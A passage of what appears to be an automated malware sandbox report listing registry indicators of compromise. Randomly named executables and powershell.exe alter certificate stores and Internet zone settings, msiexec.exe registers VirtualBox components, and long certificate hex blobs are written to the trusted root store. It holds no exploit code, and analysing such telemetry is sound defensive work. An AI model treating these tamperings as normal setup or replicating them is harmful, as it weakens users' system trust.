(data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ jyVPweM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" jyVPweM.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" jyVPweM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing jyVPweM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" jyVPweM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs MsiExec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix jyVPweM.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0F7B8A22-C71F-4A36-8E5F-A77D01D76090}\NumMethods\ = "18" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{88394258-7006-40D4-B339-472EE3801844}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{A6DCF6E8-416B-4181-8C4A-45EC95177AEF}\ProxyStubClsid32 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{F25ACA3D-0B79-4350-BDD9-A0376CD6E6E3} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DDCA7247-BF98-47FB-AB2F-B5177533F493}\NumMethods\ = "34" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0075FD6C-00C2-4484-0077-C057003D9C90}\NumMethods\ = "32" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{6620DB85-44E0-CA69-E9E0-D4907CECCBE5} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C19073DD-CC7B-431B-98B2-951FDA8EAB89}\ = "IHostUSBDevice" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{89A63ACE-0C65-11EA-AD23-0FF257C71A7F}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{D05C91E2-3E8A-11E9-8082-DB8AE479EF87}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{41304F1B-7E72-4F34-B8F6-682785620C57}\ = "IExtPackFile" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\VirtualBox.VirtualBox.1\CLSID msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DAAF9016-1F04-4191-AA2F-1FAC9646AE4C}\NumMethods\ = "13" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5748F794-48DF-438D-85EB-98FFD70D18C9}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A06FD66A-3188-4C8C-8756-1395E8CB691C}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{35CF4B3F-4453-4F3E-C9B8-5686939C80B6}\TypeLib\Version = "1.3" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{F692806F-FEBE-4049-B476-1292A8E45B09} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2405F0E5-6588-40A3-9B0A-68C05BA52C4B}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{92F21DC0-44DE-1653-B717-2EBF0CA9B664}\NumMethods\ = "39" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{4FDEBBF0-BE30-49C0-B315-E9749E1BDED1}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{678FBD9A-93AF-42A7-7F13-79AD6EF1A18D}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{D3D5F1EE-BCB2-4905-A7AB-CC85448A742B}\NumMethods msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2FD82A4B0C2D65943AA4D477AB9223CC\Language = "1033" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{08889892-1EC6-4883-801D-77F56CFD0103}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{08E25756-08A2-41AF-A05F-D7C661ABAEBE}\ = "IVRDEServer" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{C40C2B86-73A5-46CC-8227-93FE57D006A6}\ProxyStubClsid32 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{11BE93C7-A862-4DC9-8C89-BF4BA74A886A}\ProxyStubClsid32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E14C189-4A75-437E-B0BB-7E7C90D0DF2A}\NumMethods\ = "88" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{41A033B8-CC87-4F6E-A0E9-47BB7F2D4BE5}\ = "IInternalProgressControl" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{59A235AC-2F1A-4D6C-81FC-E3FA843F49AE}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{74AB5FFE-8726-4435-AA7E-876D705BCBA5}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{678FBD9A-93AF-42A7-7F13-79AD6EF1A18D}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{6E253EE8-477A-2497-6759-88B8292A5AF0}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{ADF292B0-92C9-4A77-9D35-E058B39FE0B9}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\.ova msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{D0D93830-70A2-487E-895E-D3FC9679F7B3}\TypeLib msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{890ED3DC-CC19-43FA-8EBF-BAECB6B9EC87}\NumMethods\ = "10" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{758D7EAC-E4B1-486A-8F2E-747AE346C3E9}\NumMethods\ = "23" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F9B9E1CF-CB63-47A1-84FB-02C4894B89A9}\NumMethods\ = "13" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{85632C68-B5BB-4316-A900-5EB28D3413DF}\NumMethods\ = "229" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{50CE4B51-0FF7-46B7-A138-3C6E5AC946B4}\ = "IGuestDnDTarget" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C8ADB7B0-057D-4391-B928-F14B06B710C5}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C1BCC6D5-7966-481D-AB0B-D0ED73E28135}\NumMethods\ = "14" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\ = "VirtualBoxClient Class" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0B3CDEB2-808E-11E9-B773-133D9330F849}\ = "IGuestMonitorInfoChangedEvent" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{D78374E9-486E-472F-481B-969746AF2480}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{14C2DB8A-3EE4-11E9-B872-CB9447AAD965} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B66349B5-3534-4239-B2DE-8E1535D94C0B}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{E4B301A9-5F86-4D65-AD1B-87CA284FB1C8} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{74AB5FFE-8726-4435-AA7E-876D705BCBA5}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4F4ADCF6-3E87-11E9-8AF2-576E84223953}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{027BC463-929C-40E8-BF16-FEA557CD8E7E}\NumMethods msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D0A0163F-E254-4E5B-A1F2-011CF991C38D}\NumMethods\ = "82" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{D37FE88F-0979-486C-BAA1-3ABB144DC82D} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{00F4A8DC-0002-4B81-0077-1DCB004571BA} msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{B5DDB370-08A7-4C8F-910D-47AABD67253A}\NumMethods msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{DAAF9016-1F04-4191-AA2F-1FAC9646AE4C}\TypeLib msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{20479EAF-D8ED-44CF-85AC-C83A26C95A4D}\ProxyStubClsid32 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{5155BFD3-7BA7-45A8-B26D-C91AE3754E37}\ProxyStubClsid32 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Interface\{DEDFB5D9-4C1B-EDF7-FDF3-C1BE6827DC28}\ProxyStubClsid32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0F7B8A22-C71F-4A36-8E5F-A77D01D76090}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A5BBDB7D-8CE7-469F-A4C2-6476F581FF72}\TypeLib\Version = "1.3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{455F8C45-44A0-A470-BA20-27890B96DBA9}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{93BADC0C-61D9-4940-A084-E6BB29AF3D83}\ProxyStubClsid32 msiexec.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e buTfUAKLG6Z7VwsHgBNeoZ5x.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e buTfUAKLG6Z7VwsHgBNeoZ5x.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e buTfUAKLG6Z7VwsHgBNeoZ5x.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 buTfUAKLG6Z7VwsHgBNeoZ5x.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 